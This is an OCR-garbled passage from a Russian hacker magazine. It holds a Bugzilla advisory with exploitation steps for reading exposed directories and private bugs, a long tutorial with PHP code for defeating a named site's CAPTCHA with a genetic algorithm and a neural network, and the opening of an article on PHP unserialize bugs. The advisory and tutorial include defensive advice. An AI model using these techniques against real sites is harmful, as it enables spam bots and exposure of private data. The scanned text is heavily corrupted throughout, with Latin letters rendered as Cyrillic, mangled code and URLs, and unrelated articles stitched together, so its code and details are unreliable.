про статус «1; га з Ь» разработчики попросту забыли. 



50ШТІ0Ы 



Каки всегда, незабывай про своевременные обновления 
своего блога — ШрТ/ѵѵогфгезз.огд/боѵѵпІоасІ . 




РАСКРЫТИЕ ДАННЫХ В ВІЮ2ІІ_І_А 



Еш 

ВидгіІАа — это известнейший опенсорсный баг-трекер, который ис- 
пользуется множеством популярных проектов (например, Мозиллой — 

Ь[[р5://Ьид2І[[а.ппо2ІЦа.огд ). 

Недавно в данном движке были обнаружены сразудве уязвимости, 
которые позволяютудаленному пользователю раскрыть чувствительную 
информацию. 

Первая уязвимостьзаключается втом, что поумолчанию в Багзилле нет 
запрета на просмотр некоторых важных файлов и каталогов с помо- 
щью банального .Ыассезз, а вторая — втом, что движокнеправильно 
организует политику доступа к багам, перемещенным из одного продукта 
в другой. 

Смотрим файл ргосе55_Ьид.сді (в районе 249 линии): 



іогеасЬ шу $дгоир ( @ { $Ъид->ргос1исЦ_оЬН ->дгоирз_ѵа1іс!} ) 

Ошибка заключается втом, «$Ьид->ргосІис1:_оЬ_і" обновляется до 
применения групповых политик безопасности, то есть на данном 
этапе баг все еще не перемещен в новый продукт, мы только лишь 
лишь проверяем валидность старых групп этого продукта, но никак не 
новых. Таким образом, все группы, которые не являются доступными 
для старого продукта, игнорируются. 

ДОііЫіі 

Эксплуатация уязвимостей выглядит достаточно тривиально: 

1. Просто натравливаем свой браузер на открытые каталоги «СѴ5/», 
«со пігі Ь/ », «босз/еп/хті/», «{/" и файл «оШ-рагатз.М», в котором 
может храниться бэкап настроек движка; 

2. Если приватный баг переносится из одного продукта в другой, при 
этом одинаковые группы не используются для обоих продуктов и не при- 
меняются никакие другие ограничения для групп, то этот баг становится 
видимым для всех(уже на странице нового продукта), так что ты легко 
сможешь просмотреть всю информацию о баге в открытом доступе. 
Подробное абѵізогудля этих уязвимостей ищи на официальном сайте 
Багзиллы Ьидгіііа .огд/геси гИ:у/3.0. 1 0 . 



ТАВСЕТ5 



Первый баг: Видгіііа < 3.0.1 1 , < 3.2.6, < 3.4.5, <3.5.3 
Второй ба г: В и д г і На версий от 3.3.1 до 3.4.4 и 3.5.1 , 3.5.2 



Подробности уязвимости, а также эксплойт, который сам ищет 
Ігазб-посты на нужном блоге с открытой регистрацией ты сможешь най- 
ти в оригинальном абѵізогу по адресу Ы[р:/Дтасик.со.ик/?р=180 . 



ТАК6ЕТ5 



ЭДогсІРгезз 2.9, 2.9.1 



50ШТЮЫ 



Все обновления безопасности для Видгіііа качай 
здесь: ЫірѴ/ѵѵѵѵѵѵ.Ьидгіиа.огд/сІоѵѵпІоасІ (или просто используй 
.Ыассезз для ограничения доступа к указанным каталогам и файлу 
и грамотно применяй групповые политики безопасности для своих 
приватных багов), т 
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I Артём Заруцкий ргітаІ.ізиОдтаіІ.согт 




Взло 




РАЗБИРАЕМСЯ, 

КАК ЛОМАЮТ КАПНИ 



В последнее время ни один более или 
менее популярный сайт не обходится 
без использовании капчи. Эпоха «Веб 
2.0» дала пользователям возможность 
изменять содержание сайтов, но такую 
возможность получили и спамеры. 
Ручное заполнение форм спамерам 
экономически невыгодно, поэтому они 
используют роботов, на пути которых 
и становится капча. САРТСНА - Сот- 
ріеіеіу Аиіотаіеб РиЬІіс Тигіпд Іе$1 
(о (еіі Сотриіегз апб Нитапз Арагі. 
Принцип капчи основан на сложности 
автоматического распознавания 
искаженного и зашумленного текста. 




АДЕКВАТНОСТЬ ЗАЩИТЫ 

При выборе капчи стоит исходить из основного правила построе- 
ния систем безопасности — стоимость взлома не должна превы- 
шать стоимость того, что может получить злоумышленник. Однако, в 
случае с капчей есть две проблемы, не позволяющие нам в полной 
мере реализовать это правило. Во-первых, чрезмерное усложнение 
капчи может отпугнуть некоторую часть посетителей сайта, напри- 
мер, если заставлять их вводить код с изображения при добавлении 
каждого комментария (как это делают некоторые владельцы блогов в 
І_іѵеЗоигпаІ]. Вторая проблема — «китайцы». В интернете существует 
несколько сервисов, предлагающих услуги по ручному распознава- 
нию капчей жителями Китая и некоторых других стран, готовых рабо- 
тать за мизерную плату. Часть этих сервисов заявляют, что обладают 
уникальными технологиями автоматического распознавания образов, 
однако, при ближайшем рассмотрении такие факты, как задержка 
в 30 секунд перед отправкой ответа и вероятность распознавания 
выше 90%, выдают их реальные схемы. Стоимость распознавания 
1000 экземпляров начинается от $1 , что не так уж и много. Кроме 
того, существует давно известный способ бесплатного краудсорсин- 
га — подстановка капчи, требующей распознавания, на другой ресурс 
(как правило порно-сайт), пользователи которого, ничего не подозре- 
вая, будут вводить код с изображения. Эти факты ограничивают наши 
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Эффектналожения фильтра пояркости 



На некоторых изображениях линии практически не пересекают циф- 
ры, и такие изображения встречаются достаточно часто 






Вырезаем 4 цифры из изображе- 
ния и приводим ихк прямоуголь- 
ному виду ( 16 x 24 пикселов) 



возможности по усложнению защиты. 

Говоря об адекватности защиты, стоит разделить спам-роботов 
на автоматических и полуавтоматических. Автоматические робо- 
ты подобно роботам поисковых систем переходят с сайта на 
сайт и пытаются заполнить и отправить любую форму, которую 
встретят по пути. Если после отправки формы на странице появ- 
ляется отправленная информация, форма заносится в список и 
периодически «спамится». Продвинутые версии таких роботов 
способны распознавать некоторые виды популярных капч, но 
большая часть капчей, особенно разработанные для сайта инди- 
видуально, таких роботов успешно останавливают. Собственно, 
автоматические роботы и являются основной угрозой для пода- 
вляющего большинства сайтов. Сайты с большой посещаемо- 
стью или хотя бы хорошим рейтингом РадеВапк могут удостоить- 
ся персонального внимания спамеров, что может означать более 
«тонкую» настройку робота, использование «китайцев» или при- 
менение системы распознавания образов, пример которой будет 
рассмотрен чуть ниже в этой статье. 

НЕМНОГО МАТЕМАТИКИ 

При распознавании капчи задача состоит не столько в увеличе- 
нии точности распознавания, как это может показаться на первый 
взгляд, сколько в минимизации процессорного времени, необходи- 
мого для успешного распознавания одного экземпляра. Немногие 
сайты отслеживают количество неудачных попыток ввода капчи, но 
в любом случае такие ограничения легко обходятся при использова- 
нии нескольких прокси-серверов. Таким образом точность распозна- 
вания, равная даже в 1%, может считаться успешной, при условии 
приемлемого расхода процессорного времени на все 100 попыток. 
Одна из основных характеристик капчи — количество возможных 
вариантов ответа. Допустим, наша капча состоит из 6 цифр и сим- 
волов латинского алфавита в нижнем регистре, тогда количество 
всех возможных комбинаци й (10 + 26] л 6 равно приблизительно 2 
млрд., что практически недостижимо для случайного перебора. К 
сожалению, не все проводят такие расчеты, поэтому периодически 
появляются капчи, предлагающие ответить, какое животное изобра- 
жено на картинке, имея при этом всего лишь 10 вариантов ответа. 
При ручном анализе такого сайта, спамеру будет достаточно указать 
роботу только один вариант ответа — теория вероятностей сделает 
все остальное. Сюда же можно отнести и всевозможные арифмети- 
ческие задачи («Сколько будет пять умножить на семь?»], которые 
легко решаются при помощи регулярных выражений. Однако, для 
полностью автоматических роботов даже такого вида защиты будет 
достаточно. 

Ещё одно популярное заблуждение создателей капчей: чем слож- 
нее прочитать код человеку, тем сложнее прочитать его роботу. Это 
заблуждение приводит к появлению капч, которые пользователи 
с трудом вводят с десятой попытки, но при этом автоматическое 
распознавание работает на ура. Например, человеку трудно читать 
светлый шрифт на светлом фоне, а для системы распознавания 
разница между цветами в один бит так же легко определяется как 
и визуально заметная разница. Вообще, использование в капче 
более чем двух цветов практически бесполезно, обратите внима- 
ние на капчи крупных сайтов — большая часть из них состоят из 
темной одноцветной надписи на белом фоне. Это связано с тем, 



что наиболее сложной задачей является распознавание текста в 
самой надписи, а не поиск её местоположения на изображении. 
Помимо прямой уязвимости, капча может оказаться ненадежной 
из-за уязвимости в скриптах. Например, самая глупая ошибка — 
передавать текст капчи в виде параметра к скрипту, который гене- 
рирует изображение. Или возможность использовать код с изобра- 
жения несколько раз в течение какого-то времени. 

ПРИМЕР ВЗЛОМА 

Итак, лучший способ понять, как оценить надежность капчи — разо- 
брать пример взлома. Выбор пал на капчу сайта хакер. ги, которая 
используется при регистрации новых пользователей и добавлении 
комментариев. Код состоит из четырех цифр, что дает нам 10000 
вариантов — не так уж и много, но от прямого перебора защитит. 

Для вывода цифр используется один шрифт, надпись слегка пово- 
рачивается в пространстве, но поворот настолько незначитель- 
ный, что мы не будем принимать его во внимание. «Пиксельный» 
шум по всему изображению снимается простейшим фильтром по 
яркости: все пиксели, яркость которых выше некоторого значения, 
закрашиваются белым цветом, остальные — черным. Такая опе- 
рация очищает практически весь шум, за исключением отдельных 
точек, не мешающих дальнейшей обработке. Остается лишь одна 
проблема — случайно разбросанные линии, которые значительно 
затрудняют, во-первых, определение позиции надписи, во-вторых, 
распознавание отдельных цифр. Поставим задачу довести точность 
распознавания хотя бы до 5% при приемлемых затратах процессор- 
ного времени. Такая постановка задачи позволит нам выбрать уяз- 
вимость, которая должна встречаться хотя бы в каждой 20-й капче и 
с большой вероятностью гарантировать нам распознавание. И такая 
уязвимость есть — на некоторых изображениях линии практически 
не пересекают цифры и такие изображения встречаются достаточно 
часто. От этой особенности и будем отталкиваться. 

Для работы нам в первую очередь потребуется набор распознанных 
образцов. Скажем, 100 штук для начала будет достаточно. Для этого 
придется немного поработать «китайцем», но для упрощения задачи 
можно написать небольшой скрипт, загружающий изображения с 
капчами с сервера и формирующий форму, которую нам придется 
заполнить вручную. Так как мы решили опираться на наименее 
зашумленные изображения, то в качестве образцов стоит использо- 
вать именно их. Итак, через несколько минут скучной работы у нас 
есть директория, в которой аккуратно сложены файлы с капчами, 
имена которых соответствуют кодам на изображении (например, 
2716.ірд]. Для подобных экспериментов лучше всего подходят скрип- 
товые языки, такие как РНР или Руібоп, также может быть полезен 
МаіТаЬ, в котором есть удобные библиотеки для анализа и обработки 
изображений. Мы будем использовать РНР, в котором все функции 
для работы с изображениями имеют префикс ітаде, для низкоуров- 
невой работы с пикселями достаточно ітадесоІогаЕ Вот, например, 
фрагмент кода, который формирует маску изображения с темными 
участками: 

сіазз Хакер_САРТСНА 

{ 

// Расстояние между двумя цветами 
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ргокескеб Іипскіоп соіогбізк ( $со1ог1 , $со1ог2) 
{ 

гекигп здгк (ром ( ( ( $со1ог1 » 16) & ОхРР) 

- (($со1ог2 » 16) & ОхРР), 2) 

+ ром ( ( ( $со1ог1 » 8) & ОхРР) 

- ( ($со1ог2 » 8) & ОхРР) , 2) 

+ ром(($со1ог1 & ОхРР) 

- ($со1ог2 & ОхРР), 2)); 



// Создание маски изображения, выделяющей пиксели, 
отстающие от белого фона 
// больше чем на 200 единиц 
ргоСескеб Іипсбіоп ирбабе_тазк ( ) 

{ $СЬ.із->тазк = аггау ( ) ; 
бог ($1 = 0; $і < $кЬ.І8“>тсікЬ.; $і + +) 
бог ($з = 0; $з < $бкіз->Ь.еідЬ.б ; $ 3 ++) 
$бМз->тазк[$і] [$з ] = $бЬіз->со1огбізб 

(ітадесоіогаб ( $бМз->ітаде , $і, $з), 
$бЫз->Ьд_со1ог) > 200 ? 1 : 0; 



} 

Маска, во-первых, выполняет роль упомянутого выше фильтра по 
яркости, а, во-вторых, увеличивает скорость работы с изображени- 
ем — нет необходимости каждый раз выполнять преобразования при 
сравнении цветов пикселей. 



темное пятно, по форме напоминающее нашу надпись (нам 
известны размеры цифр и расстояния между ними]. Итак, у нас 
есть 4 прямоугольника, которые при наличии наклона шрифта 
превращаются в параллелограммы, необходимо найти такое 
расположение этой группы параллелограммов и такой наклон, 
чтобы минимизировать суммарную яркость внутри этих парал- 
лелограммов. В итоге у нас есть три параметра: х, у (левый 
верхний угол первого параллелограмма] и б — сдвиг нижнего 
основания относительно верхнего. Такой метод поиска надписи 
будет эффективен для не слишком зашумленных линиями изо- 
бражений, о которых мы и говорили выше. 

Для решения подобных задач оптимизации, таких, для которых 
нет возможности найти аналитическое решение, хорошо подходят 
генетические алгоритмы. Генетический алгоритм моделирует про- 
цессы биологической эволюции: на основе естественного отбора 
направляет случайный перебор решений в нужном направлении 
(максимизации или минимизации целевой функции]. На первом 
шаге алгоритма создается начальная популяция особей, каждая 
особь — один из вариантов решения (набор параметров). Затем 
для каждой особи рассчитывается значение целевой функции, 
называемое в контексте эволюции приспособленностью. Если 
значение целевой функции устраивает постановщика задачи, 
алгоритм останавливается, если нет — начинается создание 
нового поколения. 

Новое поколение формируется на основе предыдущего с помо- 
щью операторов мутации и кроссовера, которые моделируют соот- 
ветствующие биологические процессы. Оператор мутации изменя- 
ет случайным образом один из параметров решения, а оператор 
кроссовера скрещивает два решения (например, случайным 
образом выбирается часть параметров первого решения и соеди- 
няется с соответствующими параметрами второго]. Отбор особей 
для создания нового поколения осуществляется по принципу 
естественного отбора — чем выше значение целевой функции 
(приспособленность] особи, тем выше вероятность её перехода в 
новую популяцию. После создания нового поколения вновь про- 
водится оценка каждой особи, выявляется лучшая и проверяется 
условие остановки. Если цель всё ещё не достигнута, создается 
очередная популяция и т.д. В нашем случае решением является 
вектор из трех переменных х, у и б, а целевая функция — суммар- 
ная яркость пикселов внутри параллелограммов. Расчет целевой 
функции производится следующим образом: 



ПОИСК НАДПИСИ 

Основной принцип, на котором основаны надежные капчи, — 
затруднение выделения отдельных символов в надписи. Это 
достигается путем смещения символов относительно их перво- 
начальных позиций и искажений надписи в целом. В капче 
сайта хакер. ги расстояния между центрами цифр (~19 пикселов) 
и размеры самих цифр (16x24 пискселов] практически не меня- 
ются. Из всех искажений, применяемых к надписи, значитель- 
ный эффект оказывает только наклон шрифта — им нам прене- 
бречь не удастся. 

Если бы не шумовые линии, мы бы смогли сразу точно опреде- 
лить расположение цифр на изображении путем отсечения свет- 
лых участков со всех четырех сторон — наши цифры были бы 
единственным темным пятном. Но придется решить небольшую 
оптимизационную задачу. Задача оптимизации в общем виде 
состоит в поиске оптимального значения параметров некоторой 
целевой функции, значение которой необходимо максимизиро- 
вать или минимизировать. В нашем случае целевой функцией 
будет суммарная яркость (точнее её обратное значение] области 
предполагаемого расположения надписи. 

Другими словами мы будем стараться найти на изображении 



// Функция вызывается во время работы генетического 
алгоритма 

риЫіс Іипсбіоп Резк_бпа ($ аггау ) 

{ 

$1іРпезз = 0; 

Іог ($б = 0; $б < $кМз->бідікз_диапкі1:у ; $б++) 

Іог ($і = 0; $і < $кЪ.із->бідік_мібк]т; $і + +) 

Іог ($з = 0; $з < $Щтіз->бідік_Ъ.еідЫ: ; $з++) 

{ 

// Вычисление позиции пикселя на основе отступов 
(х, у) и сдвига (б) 

$х = $Щтіз->бідік_кегпіпд * $б + $і + 

$аггау['х'] + гоипб ( $аггау [ 1 б ' ] * ($1 / $кМз->бідік_ 

кеідЪЩ) ) ; 

$у = $3 + $аггау [ ' у ' ] ; 

$1ікпезз += $Щііз->тазк [ $х] [ $у ] ; 

} 

гекигп $1ікпезз; 

} 
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Структура искусственной нейронной сети для рас- 
познавания символов 



Так как во время работы алгоритма расчет целевой функции для 
заданного решения будет происходить многократно, разумно будет 
использовать маску, создание которой было описано ранее. Маска 
позволит избежать многократных преобразований и сравнений цве- 
тов пикселей при оценке решения. Реализовав алгоритм и проведя 
тестирование получаем очень хорошие результаты — 90% точного 
определения расположения надписи при затратах в одну-две секун- 
ды процессорного времени. На основе найденного решения «выре- 
заем» все 4 цифры из изображения и приводим их к прямоугольному 
виду (16x24 пикселов): 

ргобесбеб бипсбіоп біѵібе_бідібз ( $рагашз ) 

{ 

$бПіз->бідібз = аггау ( ) ; 

бог ($і = 0; $і < $бПіз->бідібз_диапбібу ; $і + +) 

{ 

// Создаем изображение для отдельной цифры 
$бЪ.із->бідібз [ $і] [ ' ішаде 1 ] = 

ітадесгеабебгиесоіог ( $бМз->бідіб_ѵ7ІббП, 
$бПіз->бідіб_]теід]іб ) ; 

$ ІзТіі з — >с3.іді 1з з [$і] [ 1 ѵтісіізТт ' ] = $бПіз->бідіб_ѵ\;іббЬ.; 

$бЪ.із->бідібз [ $і] [ ' ЬеідПб ' ] = $бМз->бідіб_Ьеід1іб ; 

бог ($х = 0; $х < $бЪ.із->бідіб_Ѵ\ГІббЪ.; $х++) 

{ бог ($у = 0; $у < $бПіз->бідіб_1іеідбіб ; $у+ + ) 

{ 

// Вычисляем сдвиг, " выпрямляющий " изображение 
$б = гоипб ( $рагатз [ 1 б' ] * ( $у / $бЬ.із->бідіб_ 

Ъ.еідЪ.6) ) ; 

$со Іог = ітадесоіогаб ( $бПіз->ітаде , $х + 
$бПіз->бідіб_кегпіпд * $і + $б + $рагашз [ 1 х ' ] , $у + 
$рагашз [ ' у ' ] ) ; 

ітадезебріхеі ( $бПіз->бідібз [ $і ] [ ' ітаде ' ] , $х, $у, 
$со!ог) I 



} 



} 



} 



РАСПОЗНАВАНИЕ 

Теперь задача сводится к распознаванию каждой отдельной 
цифры. Даже на «удачных» образцах с низкой зашумленностью 
цифры все равно в большинстве случаев перекрываются линия- 
ми, что не позволит нам просто сравнивать их с шаблонами. 
Классический инструмент для распознавания текста — искус- 
ственные нейронные сети, которые мы и будем использовать. 
Искусственная нейронная сеть представляет собой математи- 
ческую модель нейронной сети головного мозга человека (или 



животного). Нейросеть состоит из простейших элементов — ней- 
ронов. Нейроны связаны между собой, по этим связям проходят 
сигналы — числа от 0 до 1 . Каждый нейрон выполняет несложную 
математическую операцию: на основе поступающих от других ней- 
ронов сигналов и их весов вычисляется выходной сигнал текущего 
нейрона. Веса связей между нейронами являются параметрами, 
которые определяют работу нейронной сети. Нейроны группируют- 
ся в последовательность слоев (ІеесІІюгѵѵагсІ сети), входной сигнал 
(условия задачи) поступает на первый слой и последовательно 
проходит все слои до последнего (решение). Обучение нейронной 
сети может происходить с учителем (набором уже решенных задач) 
или без него (например, на основе реакции среды). Обучение с 
учителем происходит путем последовательного выполнения ней- 
ронной сети на уже решенных задачах и сравнения получившегося 
результата с ответом: если ответ не совпадает, производится кор- 
рекция весов связей. С математической точки зрения нейронная 
сеть в целом — это «черный ящик». Процессы, происходящие вну- 
три нейросети, очень трудно поддаются математическому анализу, 
поэтому для прикладных целей нейросеть достаточно рассматри- 
вать как некоторую систему, способную находить закономерности 
в некоторых наборах данных. Самостоятельно реализовывать 
нейронные сети для такой задачи дело неблагодарное, поэтому 
мы воспользуемся бесплатной библиотекой Разі: Агббсіаі Ыеигаі 
Ыеіѵѵогк ( ѵѵѵѵѵѵ.ІеепІБзеп.сІкЛапп ). Эта библиотека хороша тем, что 
имеет интерфейсы практически для всех популярных языков про- 
граммирования и требует минимального опыта работы с нейросе- 
тями. Для использования достаточно нескольких функций: 

// Создание нейросети 
/ / Параметры : 

// 1. Количество слоев и нейронов в каждом из них 
// 2. Связность нейросети (1 — полносвязная) 

// 3. Скорость изменения весов при обучении 
$апп = бапп_сгеабе (аггау (384 , 150, 10), 1, 0.7); 

// Обучение нейросети 
/ / Параметры : 

// 1. Нейросеть 

// 2. Обучающий набор (массив, содержащий массивы, 
соответствующие входному и выходному слоям) 

// 3. Максимальное количество итераций 
/ / 4 . Допустимая погрешность 

// 5. Промежутки, через которые выводится отчет об 
обучении 

бапп_бгаіп ( $апп, $зеб, 10000, 0.001, 100); 

// Выполнение нейросети на входном наборе $іприб 
$оибргШ = бапп_гип ( $апп, $іприб) ; 

// Запись нейросети в файл 
бапп_заѵе ( $апп , ' апп . баба ' ) ; 

// Загрузка нейросети из файла 
$апп = бапп_сгеабе ( ' апп . баба ' ) ; 

Опытным путем была подобрана оптимальная структура нейронной 
сети для нашей задачи — три слоя по 384, 150 и 10 нейронов. Первый 
(входной) слой принимает значения соответствующих пикселов (16x24 
= 384) изображения цифры, нормализованные к отрезку от 0 до 1 (зна- 
чение яркости), внутренний слой играет основную роль в распозна- 
вании, а последний выходной слой представляет собой вектор из 10 
переменных от 0 до 1, каждая из которой соответствует одной из цифр: 
чем выше значение, тем больше подобие изображения, соответствую- 
щей цифре. В данном случае используется только один внутренний 
слой, потому что логика, реализуемая нашей нейросетью, практиче- 
ски является «примеркой» усредненных шаблонов каждой цифры к 
изображению, поэтому нескольких последовательных операций не 
требуется. Для обучения нейросети воспользуемся заготовленными 
образцами, кроме того нам потребуется ещё один набор образцов для 
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5аг.эѵег - 8іг_гер1асе , 5211е) ; 

5хс » пеѵ Ха 1еер_САРТСНА ( 5 31 г . 5 111е , ' «г.г. . Леа 1 , 4, Іапзѵег) ; 
$оиі ■ $хс->рагэеО: 

5аеі [)■ 5хс->а«яр1ег 



сіозесііг (5дЫ ; 

> 

іааг. - 2аая_СЕеаее(агтау|3 5'‘, 150, 10), 0.0); 

2апп_ега1п|*аяя, іаес. 10000, 0.:::, 100); 
Гапа_ааѵе(5апя, •аяп.аат.а’ ) ; 
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Код для обучения нейронной сети 



независимого тестирования, который должен формироваться случай- 
ным образом без учета зашумленности: 

іипсііоп ігаіп ( ) 

{ 

$сііг = "затріез/"; 

$зеі = аггау () ; 

І.І ( $с31і = орепсііг ( $с3.іг ) ) 

{ 

ѵ^іііе (($іі1е = геасісііг ( $сИі) ) !== іаізе) 

{ 

Іі ( іііеіуре ( $с!іг . $іі1е) == ' іііе ' ) 

{ 

$апзмег = зіг_геріасе ( 1 орд 1 , 11 , $іі1е) ; 

$хс = пеѵі Хакер_САРТСНА ( $с!іг . $іі1е , 

' апп. сіаіа 1 , 4, $апзмег) ; 

$оиі = $хс->рагзе ( ) ; 

$зеі []= $хс->затр1е; 

} 

} 

сіозесііг ( $сИі) ; 

} 

$апп = іапп_сгеаіе (аггау (3 84 , 150, 10), 1, 0.7); 
іапп_ігаіп ( $апп, $зеі, 10000, 0.001, 100); 

іапп_заѵе ( $апп, 'апп. сіаіа' ) ; 

} 

Первая попытка обучения на 100 образцах дала 43% успешных рас- 
познаваний на независимом тестовом наборе, что соответствует 
примерно 3% (0.43 л 4], что уже близко к нашей цели. Дополнив базу 
образцов ещё 100 экземплярами, получаем 55% успешных распозна- 
ваний отдельных цифр и примерно 10% всей капчи. С учетом того, что 
на попытку распознавания одной капчи расходуется около 1-2 секунд 
процессорного времени, общие затраты на успешный взлом одной 
капчи составят 10-20 секунд. Это, в целом, приемлемое время, однако 
увеличение количества образцов для обучения нейросети позволит 
значительно снизить эти расходы. Для тестирования используем сле- 
дующий КОД: 

іипсііоп іезі ( ) 

{ 

$с1іг = " іезі/"; 

$с = 0; 

$ѵ\гіпз = 0 ; 

іі ($с1Ь. = орепсііг ( $с!іг) ) 

{ 




Набор распознанных образов 
для обучения нейронной сети 



вдМІе ( ($іі1е = геасісііг ($сШ) ) !== іаізе) 

{ 

іі ( іііеіуре ( $сііг . $іі1е) == 'іііе') 

{ 

$хс = пеѵ? Хакер_САРТСНА ( $сііг . $іі1е , 

'апп.сіаіа' , 4) ; 

$оиі = $хс->рагзе ( ) ; 

іі ($оиі == зіг_гер1асе ( ' . зрд ' , '', $іі1е) ) 

$міпз++ ; 

ргіпі '<ітд згс= "кіір : / /ІосаІТюзі/ 

хакер_сарісЬ.а/іезі/ ' . $іі1е. ' "> ' . $оиі. ' <ЬгхЬг> ' ; 
ііизк ( ) ; 

$с++ ; 

} 

} 

сіозесііг ( $сШ) ; 

} 

ргіпі $міпз . ' / ' . $с ; 

} 

ВЫВОДЫ И ЗАКЛЮЧЕНИЕ 

Как показывает практика, любая капча может быть взломана, вопрос 
лишь в том, оправдает ли результат затраченные усилия. Что на 
данный момент точно нереализуемо, так это универсальная система 
распознавания, способная без какой либо ручной настройки распозна- 
вать любые капчи. Какие рекомендации можно дать сайту хакер. ш по 
усилению безопасности капчи? Во-первых, добавить искажения, изме- 
няющие расположение цифр относительно друг друга, что затруднит их 
разделение. Во-вторых, исключение вариантов, при которых шумовые 
линии практически не перекрывают надпись, — это также затруднит 
определение положения всей надписи и уменьшит точность распозна- 
вания цифр нейросетью. В-третьих, можно увеличить количество цифр 
хотя бы до 6, что значительно уменьшит общую вероятность успешного 
распознавания. Эти рекомендации справедливы и для большинства 
других сайтов. Для тех сайтов, взлом капчи которых является эконо- 
мически выгодным для спамеров, следует предусматривать дополни- 
тельные меры защиты, например, подтверждение регистрации через 
отправку кода по 5М5 (как это делает Ооодіе в некоторых случаях]. 
Технологии распознавания образов, текстов, звуков развиваются 
параллельно с увеличением вычислительной мощности компьюте- 
ров. Рано или поздно капчи перестанут быть преградой для роботов, 
однако, проблема может быть решена с помощью упомянутого выше 
подтверждения через смс или надежных ОрепЮ-провайдеров, осу- 
ществляющих проверку своих пользователей . пт 
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КЕСАРТСНА Тем кто хочет 

воспользоваться готовым решением, 
можно посоветовать использовать 
геСАРТСНА (гесарісЬа.пеі). геСАРТСНА 
помимо защиты сайта от роботов 
выполняют другую полезную функ- 
цию — помогает оцифровывать бумаж- 
ные книги. Капча состоит из двух слов, 
одно из которых уже было распознано 
ранее, а второе не смогла распознать 
система оцифровки книг. Пользователь, 
разумеется, не знает, какое слово неиз- 
вестно системе, поэтому вынужден 
вводить оба. геСАРТСНА хороша тем, 
что использует слова, которые ранее не 
прошли через систему распознавания, 
т.е. для ее взлома как минимум при- 
дется переплюнуть серьезную коммер- 
ческую ОСР-систему. Ко всему прочему, 
геСАРТСНА использует дополнительные 
шумы и искажения, которые периодиче- 
ски меняются. Недостаток у геСАРТСНА 
только один — она очень популярна, 
соответственно и интерес к её взлому 
очень большой. 




ТРЕХМЕРНАЯ 

КАПЧА, 

ІіГіЫ ІГЛ Создатели этой капчи 
( осг-гезеагсб.огд.иа ) уверены в ее 
стойкости. Разумеется, стандартные 
системы распознавания текста с ней 
не справятся, но при индивидуальном 
подходе можно найти ряд уязвимостей. 
Во-первых, символы расположены на 
одинаковом расстоянии друг от друга 
и находятся на одной линии (в трех- 
мерном пространстве]. Во-вторых, легко 



заметить, что торцы выпуклых символов 
состоят из многоугольников, по пло- 
щади больших, чем многоугольники 
остальной поверхности. Эти многоуголь- 
ники легко найти программно, а вместе 
они формируют отчетливые контуры 
символов. На основе контуров симво- 
лов можно определить углы, на которые 
была повернута плоскость, и развернуть 
её обратно. После этого можно прово- 
дить распознавание каждого отдельного 
символа с помощью нейронной сети. 

Так как эта капча не очень популяр- 
на, можно считать её достаточной для 
ресурсов, не представляющих особый 
интерес для спамеров. 






КАПЧА 

С ВИРТУАЛЬНОЙ 

Очень хорошая капча 
до недавнего времени была у сервиса 
таіі.ги. Капча состоит из нескольких 
символов некоторого периодически 
изменяемого алфавита. Пользователь 
вводит ответ с помощью виртуальной 
клавиатуры. Основное преимущество 
такой капчи — очень хорошая стойкость 
к ручному распознаванию «китайцами». 
Дело в том, что сервисы, предлагающие 
ручное распознавание, работают по 
принципу: отправил картинку, получил 
ответ в текстовом виде. Для ручного 
распознавания потребовалось бы соз- 
дание специального интерфейса для 
передачи помимо изображения ещё и 
виртуальной клавиатуры. Кроме того 
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ввод этой капчи занимает больше вре- 
мени, чем ввод большинства других, 
потому что определять непривычные 
для глаза символы сложнее, чем сим- 
волы латинского алфавита или цифры. 
Таким образом увеличивается стоимость 
ручного распознавания. Автоматическое 
распознавание также затруднено: 
постоянная смена символов не позво- 
лит хорошо обучить нейросеть, а также 
сами символы трудно отделить друг от 
драга. Основной недостаток — слож- 
ность ввода для обычного пользователя, 
возможно, по этой причине в таіі.ги от 
нее и отказались. 




АНИМИРОВАННАЯ 

КАПЧА 

ІШІІ 1^ Интересный вари- 
ант капчи предложил Нилой Митра из 
Института технологий Дели (видео — 
ЬгідЫсоѵе.пеѵѵзсіепІізІ.сот/зегѵісез/рІаѵег/ 
Ьср і б 222 72 71 001 ?Ьсб 6=4781 4603001 ). На 



основе трехмерной анимированной моде- 
ли некоторого объекта (например, бегущей 
лошади) создается анимация, на которой 
объект покрыт случайно изменяющимися 
пятнами. Кроме того схожими пятнами 
покрыт и весь фон. На основе одного 
кадра распознать объект может быть 
трудно, но в динамике на это уходит пара 
секунд. Автоматическое распознавание 
на данный момент крайне затруднено — 
при таком количестве шума очень трудно 
определить, какие из этих пятен должны 
формировать образ. Казалось бы, очень 
перспективное направление, однако у 
капчи есть серьезный недостаток. Для её 
использования потребуется создание базы 
анимированных моделей, на каждую из 
которых придется затратить значительное 
количество времени, иначе можно будет 
просто угадывать ответ многочисленными 
попытками. Кроме того, если каждый раз 
не генерировать новую анимацию (что дает 
большую нагрузку на процессор), можно 
будет сохранять хеши распознанных вруч- 
ную изображений. Также эта капча никак 
не защищена от сервисов, предлагающих 
ручное распознавание. 
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БАГ В КАРТИНКАХ 



ОШИБКИ ДЕСЕРИАЛИЗАЦИИ КЛАССОВ НА ЖИВЫХ ПРИМЕРАХ 



Приветствую тебя, читатель! В январском номере ][ мы подробно рассмотрели 
один из новейших багов в РНР от известного специалиста по информационной 
безопасности Стефана Эссера. Как ты наверное помнишь, баг заключается в 
небезопасном спользовании функции ипзегіаііге применительно к объектам. 
В прошлой статье я говорил о том, что данное исследование направлено на 
будущее, так как в реальных веб-приложениях более или менее серьезные 
уязвимости десериализации пока не были обнаружены. И вот... Будущее 
уже наступило! Пришла пора показать тебе подробный разбор таких багов в 
популярнейших скриптах Ріѵѵік и рИрМуАсІтіп. 



НЕМНОГО О РІѴѴІК 

Для начала расскажу тебе немного о Ріѵѵік. 

Итак, Ріѵѵік — это бесплатный скрипт веб-аналитики, позиционируе- 
мый как опенсорсная замена Соодіе апаіубсз. Эта система выросла 
из менее навороченного скрипта рбрМуѴізіІез [ рЬртѵѵізіІез.иг ]. 
Функционал Пивика впечатляет: продвинутая система плагинов (похо- 
жая на аналогичную в ѴѴогбРгезз], удобный АРІ (ты можешь получать 
любую инфу из базы данных в форматах хті, ]зоп, рбр, сзѵ], интерфейс 
юзера, основанный на виджетах (с бгад а псі бгор-примочками], пере- 
вод на множество языков, геаі бте-репорты и многие другие фичи 
уже сделали этот скрипт мегапопулярным среди веб-мастеров (только 
последнюю версию скачали около 250 тысяч раз]. 

Популярность скрипта подтверждают те факты, что Ріѵѵік несколько 
раз становился проектом месяца на зоигсеФгде.пеІ; и выигрывал пре- 
